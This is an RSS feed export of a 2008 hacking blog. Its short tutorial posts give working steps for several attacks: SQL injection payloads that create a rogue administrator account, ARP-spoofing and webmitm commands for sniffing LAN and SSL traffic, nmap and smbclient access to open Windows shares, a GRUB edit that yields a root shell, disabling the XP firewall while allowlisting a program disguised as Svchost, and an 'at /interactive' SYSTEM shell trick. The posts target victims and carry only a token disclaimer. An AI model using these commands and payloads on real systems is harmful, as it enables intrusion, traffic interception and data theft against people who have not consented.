<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Dancing With Electron...</title>
	<atom:link href="http://whiskeycola.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://whiskeycola.wordpress.com</link>
	<description>Just another WordPress.com weblog</description>
	<lastBuildDate>Sat, 10 May 2008 16:08:35 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='whiskeycola.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/0c38703f2d9b6bb72a386c82a797b589?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>Dancing With Electron...</title>
		<link>http://whiskeycola.wordpress.com</link>
	</image>
			<item>
		<title>Another trick to login bypass</title>
		<link>http://whiskeycola.wordpress.com/2008/05/10/another-trick-to-login-bypass/</link>
		<comments>http://whiskeycola.wordpress.com/2008/05/10/another-trick-to-login-bypass/#comments</comments>
		<pubDate>Sat, 10 May 2008 16:08:35 +0000</pubDate>
		<dc:creator>whiskeycola</dc:creator>
				<category><![CDATA[SQL Injection]]></category>

		<guid isPermaLink="false">http://whiskeycola.wordpress.com/?p=22</guid>
		<description><![CDATA[This method is one of the more advanced SQL Injection methods. There are three steps.First, we have to generate an error so that we can see the table names (so that we can create a privileged account). Next we have generate a slightly different error to gain another important table name. Finally, we will inject [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=22&subd=whiskeycola&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>This method is one of the more advanced SQL Injection methods. There are three steps.First, we have to generate an error so that we can see the table names (so that we can create a privileged account). Next we have generate a slightly different error to gain another important table name. Finally, we will inject SQL in order to create a new administrator account.</p>
<p>To accomplish our first goal we will inject something like the following:</p>
<p><span style="color:#888888;"><strong>Username: ‘Having1=1–</strong></span></p>
<p>Enter this and leave the password field blanks. Once this is injected we will, hopefully, receive an error message that will reveal a table name. We are hoping to get an error such as this:</p>
<p><span style="color:#888888;">Column user_member.user_id is invalid and was not found etc.</span></p>
<p>The error will be longer than that but all we really need is the table name.<br />
‘<span style="color:#888888;">user_member.id</span>’. Next, we will inject some SQL so that we can produce yet another error. Like so:</p>
<p><strong>‘<span style="color:#888888;">UNION SELECT * FROM user_member WHERE USER_ID=‘admin’ GROUP BY USER_ID HAVING 1=1;–</span></strong></p>
<p>Now we have generated another error. The error may look something like the following :</p>
<p><span style="color:#888888;">Column user_member.user_id is invalid and was not found… Column user_member.passwd is invalid and was not found etc.</span></p>
<p>The above example shows us that there <span style="color:#888888;">user_member.passwd</span> holds the passwords. We will now attempt to create another user, thus gaining us privileges. Use the bellow code in the Username field to insert the user :<strong></strong></p>
<p><span style="color:#888888;"><strong>‘INSERT INTO user_member (USER_NAME, LOGIN_ID,PASSWORD, CREATION_DATE) VALUES(‘Ethernet’,’hacked’,’hacked’,GETDATE();–</strong></span></p>
<p>Success! We can now login with the username ‘<span style="color:#888888;">Ethernet</span>’ and the password ‘<span style="color:#888888;">hacked</span>’.Please note that the errors have been shortened down and everything simplified for the purpose of this post.</p>
<p> <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/whiskeycola.wordpress.com/22/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/whiskeycola.wordpress.com/22/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/whiskeycola.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/whiskeycola.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/whiskeycola.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/whiskeycola.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/whiskeycola.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/whiskeycola.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/whiskeycola.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/whiskeycola.wordpress.com/22/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/whiskeycola.wordpress.com/22/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/whiskeycola.wordpress.com/22/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=22&subd=whiskeycola&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://whiskeycola.wordpress.com/2008/05/10/another-trick-to-login-bypass/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/490d8edd6b56cf0ece96af49f0e71967?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">whiskeycola</media:title>
		</media:content>
	</item>
		<item>
		<title>SSLDump, Webmitm and Arpspoof the trio SSL sniffing</title>
		<link>http://whiskeycola.wordpress.com/2008/05/10/ssldump-webmitm-and-arpspoof-the-trio-ssl-sniffing/</link>
		<comments>http://whiskeycola.wordpress.com/2008/05/10/ssldump-webmitm-and-arpspoof-the-trio-ssl-sniffing/#comments</comments>
		<pubDate>Sat, 10 May 2008 15:37:13 +0000</pubDate>
		<dc:creator>whiskeycola</dc:creator>
				<category><![CDATA[Sniffing]]></category>
		<category><![CDATA[Add new tag]]></category>

		<guid isPermaLink="false">http://whiskeycola.wordpress.com/?p=21</guid>
		<description><![CDATA[Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols that provide secure communications on the Internet for such things as web browsing, e-mail, Internet faxing, instant messaging and other data transfers. There are slight differences between SSL and TLS, but they are substantially the same
Sniffing SSL ? this from remote-exploit.org. [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=21&subd=whiskeycola&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><span style="color:#888888;">Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols that provide secure communications on the Internet for such things as web browsing, e-mail, Internet faxing, instant messaging and other data transfers. There are slight differences between SSL and TLS, but they are substantially the same</span></p>
<p>Sniffing SSL ? <span id="more-21"></span>this from <a href="http://www.remote-exploit.org" target="_blank">remote-exploit.org</a>. <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  it very simple and clear .only playing with iptables , arpspoofing , webmitm and get it using ssldump.</p>
<p><em><span style="color:#888888;">echo 1 &gt; /proc/sys/net/ipv4/ip_forward</span></em></p>
<p><em>iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT</em></p>
<p><em>iptables -A FORWARD -j ACCEPT</em></p>
<p><em>arpspoof -t &lt;target&gt; &lt;gateway&gt;</em></p>
<p><em>webmitm -d</em></p>
<p><em>./ssldump -n -d -k webmitm.crt | tee ssldump.log</em></p>
<p>~fin</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/whiskeycola.wordpress.com/21/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/whiskeycola.wordpress.com/21/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/whiskeycola.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/whiskeycola.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/whiskeycola.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/whiskeycola.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/whiskeycola.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/whiskeycola.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/whiskeycola.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/whiskeycola.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/whiskeycola.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/whiskeycola.wordpress.com/21/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=21&subd=whiskeycola&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://whiskeycola.wordpress.com/2008/05/10/ssldump-webmitm-and-arpspoof-the-trio-ssl-sniffing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/490d8edd6b56cf0ece96af49f0e71967?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">whiskeycola</media:title>
		</media:content>
	</item>
		<item>
		<title>Both of Arpspoof and Dsniff teach a basic sniffing</title>
		<link>http://whiskeycola.wordpress.com/2008/05/10/arpspoof-and-dsniff-teach-a-basic-sniffing/</link>
		<comments>http://whiskeycola.wordpress.com/2008/05/10/arpspoof-and-dsniff-teach-a-basic-sniffing/#comments</comments>
		<pubDate>Sat, 10 May 2008 14:32:56 +0000</pubDate>
		<dc:creator>whiskeycola</dc:creator>
				<category><![CDATA[Sniffing]]></category>

		<guid isPermaLink="false">http://whiskeycola.wordpress.com/?p=20</guid>
		<description><![CDATA[This one will tell how to sniffing a local area network,we will catch all package that flow at that network.sound Frightening huh…but it very easy&#8230; this is one simpel example how it works.in Local Area Network when your computer ping a other computer like “ping [IP target]” it will send it to all the computer [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=20&subd=whiskeycola&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>This one will tell how to sniffing a local area network,we will catch all package that flow at that network.sound Frightening huh…but it very easy&#8230; this is one simpel example how it works.in Local Area Network when your computer ping a other computer like “ping [IP target]” it will send it to all the computer in one subnet with it. and ask if there are the IP he asked. and when he get the replay so it will report to you like “64 byte from bla..bla..” that confirm if the IP you ask is ON or not. so what is sniffing is <span id="more-20"></span>we catch every package at the networks.and put in our computer and we can get it. you can get FTP,HTTP etc. packages and now how we do that.? we will do it like my way. what i always use is ARPspoofing and Dsniff.</p>
<p>ARPspoff is a tools to tell lie at networks that we is the IP that he looking for.and what we have to act like is the gateway. we must tell all the computer at the subnet if you are the gate way so all packages in that subnet comes to your computer and Dsniff is used for catch all package and make it readable by human. you can use other tools like Ettercap,Driftnet, filesnarf,Mailsnarf etc. it depending at what do you what to get. ok.. <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>1.Set your box to forward package,of course we not drop the package at your computer , we<br />
just make it flow to your’s so we can read it.!</p>
<p><em>#echo 1 &gt; /proc/sys/net/ipv4/ip_forward</em></p>
<p>2.arpspoofing,this will tell to all the box in the networks that your we’re the gate way.and<br />
forwarding the package to the real gateway</p>
<p><em>#arpspoof -t [gateway IP] [Victim IP] &amp; &gt;/dev/null</em></p>
<p>and open new shell and put this command</p>
<p><em>#arpspoof -t [victim IP] [gateway IP] &amp; &gt;/dev/nul</em>l</p>
<p>the first is for tell the victim host that now we (our MAC address) are the one belonging<br />
to the IP of the gateway and the second is to fool gateway to belive we are victim</p>
<p>3.the last is chose what do you want to sniff. like i said you can use Ettercap,Driftnet,<br />
filesnarf,Mailsnarf etc.all is the same. and now i’ll use Dsniff.</p>
<p><em>#dsniff eth0 </em>[eth# is depend your setting, because your sniffing your own box.]</p>
<p>thanks. that all. happy hacking</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/whiskeycola.wordpress.com/20/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/whiskeycola.wordpress.com/20/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/whiskeycola.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/whiskeycola.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/whiskeycola.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/whiskeycola.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/whiskeycola.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/whiskeycola.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/whiskeycola.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/whiskeycola.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/whiskeycola.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/whiskeycola.wordpress.com/20/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=20&subd=whiskeycola&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://whiskeycola.wordpress.com/2008/05/10/arpspoof-and-dsniff-teach-a-basic-sniffing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/490d8edd6b56cf0ece96af49f0e71967?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">whiskeycola</media:title>
		</media:content>
	</item>
		<item>
		<title>Play fun with samba to hack netbios</title>
		<link>http://whiskeycola.wordpress.com/2008/05/10/play-fun-with-samba-to-hack-netbios/</link>
		<comments>http://whiskeycola.wordpress.com/2008/05/10/play-fun-with-samba-to-hack-netbios/#comments</comments>
		<pubDate>Sat, 10 May 2008 12:34:36 +0000</pubDate>
		<dc:creator>whiskeycola</dc:creator>
				<category><![CDATA[NetBios]]></category>

		<guid isPermaLink="false">http://whiskeycola.wordpress.com/?p=19</guid>
		<description><![CDATA[This is another way to hacking windows box. especially for hacking our local area network.this post will show us how to hack a windows netbios share at our network. The first step in exploring remote shares is to find computers that are offering open shares. For this purpose we’ll use NMAP. We’ll start by scanning [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=19&subd=whiskeycola&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>This is another way to hacking windows box. especially for hacking our local area network.this post will show us how to hack a windows netbios share at our network. The first step in exploring remote shares is to find computers that are offering open shares. For this purpose we’ll use NMAP. <span id="more-19"></span>We’ll start by scanning for computers offering an open port 139. If the port is filtered then we may have trouble, but if its open we should be good to begin exploring. Ports 137 and 139 are used by Windows for Netbios shares.</p>
<p><em> [root@fxreza /]# nmap -sS -O xx.xx.xx.xx -p 139</em></p>
<p><em>Warning: OS detection will be MUCH less reliable because we did not find at least 1 open<br />
and 1 closed TCP port<br />
Interesting ports on (xx.xx.xx.xx):<br />
Port State Service<br />
139/tcp open netbios-ssn</em></p>
<p>Ok, so now we’ve got a potential targets,and it has the correct port. The next stage is to find out what these machine’s Netbios names are. Without this information we won’t be able to request any share information from these computers (because Microsoft tries to make everything easy, even networking, and identifies computers on a network not by their IP address but by their ‘name’). Ok, the syntax for requesting name information is ‘nmblookup -A 111.111.111.111′ with the appropriate IP address instead of the ones. The ‘-A’ flag denotes a remote computer (a lot like the windows command ‘nbtstat -A 111.111.111.111′ although that identifies existing connections). Ok, so lets see what we can see, we’ll start with the ME machine at xx.xx.xx.xx:</p>
<p><em>[root@fxreza /]# nmblookup -A xx.xx.xx.xx<br />
Looking up status of xx.xx.xx.xx</em></p>
<p><em>(Computer Name Target Will Show HERE)</em></p>
<p><em>[root@laptop /]# smbclient -L ComputerName -I xx.xx.xx.xx</em></p>
<p>I entered ‘none’ for the password and it turned out that I could retrieve this list without a password. Use the ‘-N’ flag on the smbclient command to suppress the password prompt.</p>
<p><em> [root@laptop /]# smbclient //ComputerName/c$ -I xx.xx.xx.xx (we try to come inside the<br />
drive C target)<br />
added interface ip=xx.xx.xx.xx bcast=yy.yy.yy.yy nmask=255.255.255.224<br />
Password:<br />
tree connect failed: ERRSRV &#8211; ERRbadpw (Bad password &#8211; name/password pair in a Tree<br />
Connect or Session Setup are invalid.)<br />
</em><br />
Ok,it’s failed w’ll try to get another target and we must do like we do at the first step.finding a terget. and on the example we’ll try to connect to the ’share’ disk share. We use the same ’smbclient’ command to do this, but with other arguments. What we’re going to do is actually request a connection to the share. If this completes successfully our prompt will instantly change to:</p>
<p><em>smb&gt;</em></p>
<p>At that point you can type ‘?’ to get a list of commands, but smbclient functions a lot like ftp so all those commands will be viable. Lets go ahead and see what happens when we request access to this share:</p>
<p>And you’ll notice I’m in . At this point we could use ‘put’ or ‘get’ to push or pull files to and from the share. For instance, to grab NewDoc.txt (although its size is showing as ‘0′ so I know its empty), I use:</p>
<p><em>[root@fxreza /]# smbclient //AnotherTarget/share -I ab.cd.ef.gh -N<br />
added interface ip=ab.cd.ef.gh bcast=ww.ww.ww.ww nmask=255.255.255.224<br />
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]<br />
smb: &gt; get NewDoc.txt<br />
getting file NewDoc.txt of size 0 as NewDoc.txt (0.0 kb/s) (average 0.0 kb/s)<br />
smb: &gt; exit<br />
[root@fxreza /]# ls -l NewDoc.txt<br />
-rw-r–r– 1 root root 0 Mar 17 09:28 NewDoc.txt<br />
</em><br />
Remember, I’m writing this article for educational purposes only. It is more than possible to use the information herein for legitimate purposes. Please remember, if you’re going to use this information to go exploring across the internet, don’t delete or destroy anything. People get concerned when they shut down their home computers and they get a ‘Warning: 1 user is still connected’, but when they find their tax information has been destroyed they call the cops. <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/whiskeycola.wordpress.com/19/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/whiskeycola.wordpress.com/19/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/whiskeycola.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/whiskeycola.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/whiskeycola.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/whiskeycola.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/whiskeycola.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/whiskeycola.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/whiskeycola.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/whiskeycola.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/whiskeycola.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/whiskeycola.wordpress.com/19/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=19&subd=whiskeycola&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://whiskeycola.wordpress.com/2008/05/10/play-fun-with-samba-to-hack-netbios/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/490d8edd6b56cf0ece96af49f0e71967?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">whiskeycola</media:title>
		</media:content>
	</item>
		<item>
		<title>Just two lines can obtain the root of linux machine</title>
		<link>http://whiskeycola.wordpress.com/2008/05/08/just-two-lines-can-obtain-the-root-of-linux-machine/</link>
		<comments>http://whiskeycola.wordpress.com/2008/05/08/just-two-lines-can-obtain-the-root-of-linux-machine/#comments</comments>
		<pubDate>Thu, 08 May 2008 05:25:59 +0000</pubDate>
		<dc:creator>whiskeycola</dc:creator>
				<category><![CDATA[System Account]]></category>

		<guid isPermaLink="false">http://whiskeycola.wordpress.com/?p=18</guid>
		<description><![CDATA[I will present a very easy but effective way to obtain a root account on a linux machine having a boot loader badly configured.
Sometimes [Often], in school classes, admins forget to protect grub with a password, so we will explore this weakness. 
When you boot your computer, you&#8217;ve a prompt (Grub/Lilo), asking you for which [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=18&subd=whiskeycola&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>I will present a very easy but effective way to obtain a root account on a linux machine having a boot loader badly configured.</p>
<p>Sometimes [Often], in school classes, admins forget to protect grub with a password, so we will explore this weakness. <span id="more-18"></span></p>
<p>When you boot your computer, you&#8217;ve a prompt (Grub/Lilo), asking you for which kernel you want to boot on. If the bootloader doesn&#8217;t contain any password, you can press &#8220;e&#8221; (for edit) and edit the current boot definition:</p>
<p>(current)</p>
<p>title  victim-kernel<br />
root (hd0,0)<br />
kernel /kernel-name root=/dev/hda3</p>
<p>to:</p>
<p>title  supa-kernel<br />
root (hd0,0)<br />
kernel /kernel-name root=/dev/hda3<br />
softlevel=single<br />
init=/bin/bash</p>
<p>Will give you a shell prompt with root privileges&#8230; Sometimes, before you modify something, you&#8217;ve to remount the hard drive in read&amp;write , instead of read-only.</p>
<p>If you have a lilo boot loader rather than a grub-loader, just do this:</p>
<p>image=/boot/kernel-name<br />
label=supa-kernel<br />
root=/dev/hda3<br />
append=&#8221;1&#8243;<br />
init=/bin/bash</p>
<p>and vice versa  <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/whiskeycola.wordpress.com/18/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/whiskeycola.wordpress.com/18/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/whiskeycola.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/whiskeycola.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/whiskeycola.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/whiskeycola.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/whiskeycola.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/whiskeycola.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/whiskeycola.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/whiskeycola.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/whiskeycola.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/whiskeycola.wordpress.com/18/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=18&subd=whiskeycola&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://whiskeycola.wordpress.com/2008/05/08/just-two-lines-can-obtain-the-root-of-linux-machine/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/490d8edd6b56cf0ece96af49f0e71967?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">whiskeycola</media:title>
		</media:content>
	</item>
		<item>
		<title>Playing with command prompt to config xp firewall</title>
		<link>http://whiskeycola.wordpress.com/2008/05/08/playing-with-command-prompt-to-config-xp-firewall/</link>
		<comments>http://whiskeycola.wordpress.com/2008/05/08/playing-with-command-prompt-to-config-xp-firewall/#comments</comments>
		<pubDate>Thu, 08 May 2008 05:03:27 +0000</pubDate>
		<dc:creator>whiskeycola</dc:creator>
				<category><![CDATA[Firewall]]></category>

		<guid isPermaLink="false">http://whiskeycola.wordpress.com/?p=17</guid>
		<description><![CDATA[net stop sharedaccess stop the default firewall
netsh firewall show show/config default firewall
netsh firewall set notifications  disable disable the notify when the program is
disabled by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
get more command by type netsh firewall and hit enter then type help
  [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=17&subd=whiskeycola&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><span style="color:#0000ff;">net stop sharedaccess</span> stop the default firewall<br />
<span style="color:#0000ff;">netsh firewall show show/config</span> default firewall<br />
<span style="color:#0000ff;">netsh firewall set notifications</span> <span id="more-17"></span> disable disable the notify when the program is<br />
disabled by the default firewall<br />
<span style="color:#0000ff;">netsh firewall add allowedprogram c:\1.exe Svchost</span> add the program which is allowed by default firewall</p>
<p>get more command by type netsh firewall and hit enter then type help</p>
<p> <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/whiskeycola.wordpress.com/17/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/whiskeycola.wordpress.com/17/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/whiskeycola.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/whiskeycola.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/whiskeycola.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/whiskeycola.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/whiskeycola.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/whiskeycola.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/whiskeycola.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/whiskeycola.wordpress.com/17/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/whiskeycola.wordpress.com/17/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/whiskeycola.wordpress.com/17/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=17&subd=whiskeycola&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://whiskeycola.wordpress.com/2008/05/08/playing-with-command-prompt-to-config-xp-firewall/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/490d8edd6b56cf0ece96af49f0e71967?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">whiskeycola</media:title>
		</media:content>
	</item>
		<item>
		<title>Other way to gaining access on windows xp</title>
		<link>http://whiskeycola.wordpress.com/2008/05/08/other-way-to-gaining-access-on-windows-xp/</link>
		<comments>http://whiskeycola.wordpress.com/2008/05/08/other-way-to-gaining-access-on-windows-xp/#comments</comments>
		<pubDate>Thu, 08 May 2008 04:16:33 +0000</pubDate>
		<dc:creator>whiskeycola</dc:creator>
				<category><![CDATA[System Account]]></category>

		<guid isPermaLink="false">http://whiskeycola.wordpress.com/?p=16</guid>
		<description><![CDATA[So you want to change something super-critical in registry or want to see what&#8217;s in the System Restore folder? Here&#8217;s the tutorial.

Open Command Prompt. 
Type: at &#60;time&#62; /interactive &#60;command&#62;
Replace &#60;time&#62; with now+1 (if it&#8217;s 7:30, then use 7:31 or 7:32)
Replace &#60;command&#62; with cmd (or you can use taskmgr, or any program except explorer and iexplore)
Press [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=whiskeycola.wordpress.com&blog=3631210&post=16&subd=whiskeycola&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>So you want to change something super-critical in registry or want to see what&#8217;s in the System Restore folder? Here&#8217;s the tutorial.</p>
<ul>
<li>Open Command Prompt. <span id="more-16"></span></li>
<li>Type: at &lt;time&gt; /interactive &lt;command&gt;</li>
<li>Replace &lt;time&gt; with now+1 (if it&#8217;s 7:30, then use 7:31 or 7:32)</li>
<li>Replace &lt;command&gt; with cmd (or you can use taskmgr, or any program except explorer and iexplore)</li>
<li>Press [enter]</li>
</ul>
